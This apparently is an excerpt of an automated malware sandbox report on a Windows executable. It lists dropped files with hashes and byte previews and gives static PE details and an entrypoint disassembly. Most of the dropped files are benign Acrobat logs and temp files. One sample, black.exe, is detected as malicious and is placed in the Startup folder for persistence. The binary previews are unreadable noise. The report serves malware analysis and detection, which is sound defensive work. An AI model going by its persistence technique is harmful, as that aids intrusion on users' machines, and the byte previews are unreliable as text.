                                                SHA-512:D53C6EEBE3AD6709F782C71E2528D439BD869EBC0AD6FC307C4C82DF4427BF55BBF877D118EBFC6EA1EA4C9D5FC264625044A2181BA7928A201D038942E52321
                                                Malicious:false
                                                Preview:SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:170-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=bcb587ae-1c8e-4c6c-a185-fb487858f1e4.1733724281170 Timestamp=2024-12-09T01:04:41:177-0500 ThreadID=3520 Component=ngl-lib_NglAppLib Description="SetConf

                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):29752
                                                Entropy (8bit):5.388982408897857
                                                Encrypted:false
                                                SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rR:a3p4AmaaUv9iZ
                                                MD5:55EF1E942BC78C7EE02194EE61DF929D
                                                SHA1:3B82E0670B2CCD4D7AB5217C33B7F98F0487AE5D
                                                SHA-256:91401E30B1B884272C4AD007517ABF96D8D7A0A0DCAAB5A981202F981A344996
                                                SHA-512:69F92EF43A8A56105639188AD6F23821308F20812169DC3C050D9F5E4095D030AD9584124EBEA4C5065CB030DD3074C153D8A337C4D5FD3A45C50DD625E8CDCD
                                                Malicious:false
                                                Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\1e9c6945-0fb3-4333-9423-0a681177ef1b.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                Category:dropped
                                                Size (bytes):1407294
                                                Entropy (8bit):7.97605879016224
                                                Encrypted:false
                                                SSDEEP:24576:eIowYIGNPnbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:UwZGNb3mlind9i4ufFXpAXkrfUs0qWLa
                                                MD5:DD5E646E5A339DEA766F301A1768A03D
                                                SHA1:C2FC502E4D0563D50F3A32F583C4E353F504FDC9
                                                SHA-256:2EEE2EE4A1201AEC0D19B1B961BFFA3AF0BE80D9A8320684847DDA4451AFF5F7
                                                SHA-512:E2A03E11E27C3CBC3E186FB29175A6F037CDEDBE17CAEA38F13575A5EE7A18574152A77E2E4A4AFD53613001035A1B76BB7194F292E4B8B5BE4275981480D408
                                                Malicious:false
                                                Preview:...........]..8.}. .)."{g.-.}plw.A........,..Y.tI.g.....)Q.H..'p#p`.U.S.H.)....e....a.><..w.....Dw..9.0Y~.......1.._......j.....Oh.q.\,....tn.....w..i.f..?A../.h.D..........n^......M..w......C....!..4.........w4q..F.1I.!A....(.........TN..'8...Q.........^...za..0Hm/.....{.....\....' ..1..0.qzD........'Y...... .m..8Bh... ...4...z..}.9..Lqp..M \Xe......Q..0..+C.B.4Ijm...o..co..q.d.~.8...\/.4.]....8...1.].D....K.|...hp\..... .ch.....\.g..Qpf.{N....n<......'.....KS(.k..$Q.R...6..'.....7.!....{.....b....C.v~...x...FO^..O.d.>'>...........&.. ..WR...6...^.D..A...d1|..F.g..g;.\...m..V..0..le.......4J..p.(..l'.....n_........n.0..P...Y.KJ.S.B.><.\C.}..~....,..k..V....XI#w..B..Q.B...t..\.lB;&!.n.(._=..>...+..a.......N.X{.{..ly.$V......@..E.....R.j.x[..V.....Ij.....mQ....-D....U1..J...F+.%...6.g.T.....X....(...w...8a..\1..^z.6...@R....l.i.A..,.......o..~^bM.E..qW^?.......!..)u.(&*.v....."c.H..Pp..uy...DP8.m3.:T..U=............0-~.B..w...D..'

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\55577ac6-3b04-4706-94b5-0e286619386b.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                Malicious:false
                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\65db7df6-b647-465d-9005-918eff44bd8f.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\9af8058f-f9d6-4f24-b069-2956d65fd9bd.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:rBgI81ReWQ53+sQ3POSTJJJJEQ6T9UkRm1XX/FLYVbxrr/IxktOQZ1mau4yBwsOo:r+Tegs6lTJJJJv+9UZd1ybxrr/IxkB1m
                                                MD5:774036904FF86EB19FCE18B796528E1E
                                                SHA1:2BA0EBF3FC7BEF9EF5BFAD32070BD3C785904E16
                                                SHA-256:D2FC8EA3DDD3F095F7A469927179B408102471627C91275EDB4D7356F8E453AD
                                                SHA-512:9E9662EA15AE3345166C1E51235CDCE3123B27848E4A4651CC4D2173BDD973E4AD2F8994EFF34A221A9F07AA676F52BEB6D90FF374F6CCB0D06FA39C3EFE6B31
                                                Malicious:false
                                                Preview:...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\bcf35d09-a38b-4f42-9e5d-09c0a4e6c567.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\bfe2d6d2-e579-4d5f-9e9d-4527526ac764.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                Category:dropped
                                                Size (bytes):1419751
                                                Entropy (8bit):7.976496077007677
                                                Encrypted:false
                                                SSDEEP:24576:ZtwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                MD5:971F33F2204A29A9601BD391856AD580
                                                SHA1:EFDE508CA80123F69E881A0CDEDEFC4B4713B04F
                                                SHA-256:06390D0A44CF3C02ED7D30A7985F83CC6059CC0302F02DC30E78FD711A2C7119
                                                SHA-512:CA3B3FABE111B201ECF4B23596BE7EACCB2405ECA3415658293CE8B0AF97286E4FEDE85E8511679D49124DCCF9D5C020B05A4E6C20C281ED1D8BEC0EABDF620F
                                                Malicious:false
                                                Preview:...........]..8.}. .)."{g.-.}plw.A........,..Y.tI.g.....)Q.H..'p#p`.U.S.H.)....e....a.><..w.....Dw..9.0Y~.......1.._......j.....Oh.q.\,....tn.....w..i.f..?A../.h.D..........n^......M..w......C....!..4.........w4q..F.1I.!A....(.........TN..'8...Q.........^...za..0Hm/.....{.....\....' ..1..0.qzD........'Y...... .m..8Bh... ...4...z..}.9..Lqp..M \Xe......Q..0..+C.B.4Ijm...o..co..q.d.~.8...\/.4.]....8...1.].D....K.|...hp\..... .ch.....\.g..Qpf.{N....n<......'.....KS(.k..$Q.R...6..'.....7.!....{.....b....C.v~...x...FO^..O.d.>'>...........&.. ..WR...6...^.D..A...d1|..F.g..g;.\...m..V..0..le.......4J..p.(..l'.....n_........n.0..P...Y.KJ.S.B.><.\C.}..~....,..k..V....XI#w..B..Q.B...t..\.lB;&!.n.(._=..>...+..a.......N.X{.{..ly.$V......@..E.....R.j.x[..V.....Ij.....mQ....-D....U1..J...F+.%...6.g.T.....X....(...w...8a..\1..^z.6...@R....l.i.A..,.......o..~^bM.E..qW^?.......!..)u.(&*.v....."c.H..Pp..uy...DP8.m3.:T..U=............0-~.B..w...D..'

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\eea91b9d-8101-4549-81b6-08bb21993c9f.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                C:\Users\user\AppData\Local\Temp\acrocef_low\f194a3dd-5956-443a-a2ad-52c4d7c5b3a4.tmp

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                Malicious:false
                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\black.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Entropy (8bit):7.509626966343186
                                                TrID:
                                                • Win64 Executable GUI (202006/5) 92.65%
                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                • DOS Executable Generic (2002/1) 0.92%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Y5kEUsYDFr.exe
                                                File size:912'111 bytes
                                                MD5:ec773998b0078cc58100fdb4d27dc3f4
                                                SHA1:491a3d8d31c9eabcd8f6236203c54daa12031aab
                                                SHA256:ff4fd58c1db6e88c768665983b2212e53204d7a07b3769883882179d34258933
                                                SHA512:00c01a72b8dc6254629cf942d30c05015ef44b90ad65da59b07019de3fee14f23d20f4611123308937c46f256e654e054447f42d1132f89dc1cf0af1f1b8bd60
                                                SSDEEP:24576:yuDXTIGaPhEYzUzA0JZtduqcudFpYePc+98dhK:1Djlabwz97ZdvJydU
                                                TLSH:7115D00AF7E805F8E077E538C9574946F77A7C4903709A8F13A5166B2F673A09E3A321
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                File Icon

                                                Icon Hash:1515d4d4442f2d2d

                                                Static PE Info

                                                General

                                                Entrypoint:0x140032ee0
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x140000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:2
                                                File Version Major:5
                                                File Version Minor:2
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:2
                                                Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                Entrypoint Preview

                                                Instruction
                                                dec eax
                                                sub esp, 28h
                                                call 00007F5EECB80A78h
                                                dec eax
                                                add esp, 28h
                                                jmp 00007F5EECB8040Fh
                                                int3
                                                int3
                                                dec eax
                                                mov eax, esp
                                                dec eax
                                                mov dword ptr [eax+08h], ebx
                                                dec eax
                                                mov dword ptr [eax+10h], ebp
                                                dec eax
                                                mov dword ptr [eax+18h], esi
                                                dec eax
                                                mov dword ptr [eax+20h], edi
                                                inc ecx
                                                push esi
                                                dec eax
                                                sub esp, 20h
                                                dec ebp
                                                mov edx, dword ptr [ecx+38h]
                                                dec eax
                                                mov esi, edx
                                                dec ebp
                                                mov esi, eax
                                                dec eax
                                                mov ebp, ecx
                                                dec ecx
                                                mov edx, ecx
                                                dec eax
                                                mov ecx, esi
                                                dec ecx
                                                mov edi, ecx
                                                inc ecx
                                                mov ebx, dword ptr [edx]
                                                dec eax
                                                shl ebx, 04h
                                                dec ecx
                                                add ebx, edx
                                                dec esp
                                                lea eax, dword ptr [ebx+04h]
                                                call 00007F5EECB7F893h
                                                mov eax, dword ptr [ebp+04h]
                                                and al, 66h
                                                neg al
                                                mov eax, 00000001h
                                                sbb edx, edx
                                                neg edx
                                                add edx, eax
                                                test dword ptr [ebx+04h], edx
                                                je 00007F5EECB805A3h
                                                dec esp
                                                mov ecx, edi
                                                dec ebp
                                                mov eax, esi
                                                dec eax
                                                mov edx, esi
                                                dec eax
                                                mov ecx, ebp
                                                call 00007F5EECB825B7h
                                                dec eax
                                                mov ebx, dword ptr [esp+30h]
                                                dec eax
                                                mov ebp, dword ptr [esp+38h]
                                                dec eax
                                                mov esi, dword ptr [esp+40h]
                                                dec eax
                                                mov edi, dword ptr [esp+48h]
                                                dec eax
                                                add esp, 20h
                                                inc ecx
                                                pop esi
                                                ret
                                                int3
                                                int3
                                                int3
                                                dec eax
                                                sub esp, 48h
                                                dec eax
                                                lea ecx, dword ptr [esp+20h]
                                                call 00007F5EECB6EE23h
                                                dec eax
                                                lea edx, dword ptr [00025747h]
                                                dec eax
                                                lea ecx, dword ptr [esp+20h]
                                                call 00007F5EECB81672h
                                                int3
                                                jmp 00007F5EECB87854h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3

                                                Rich Headers

                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe3bc.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
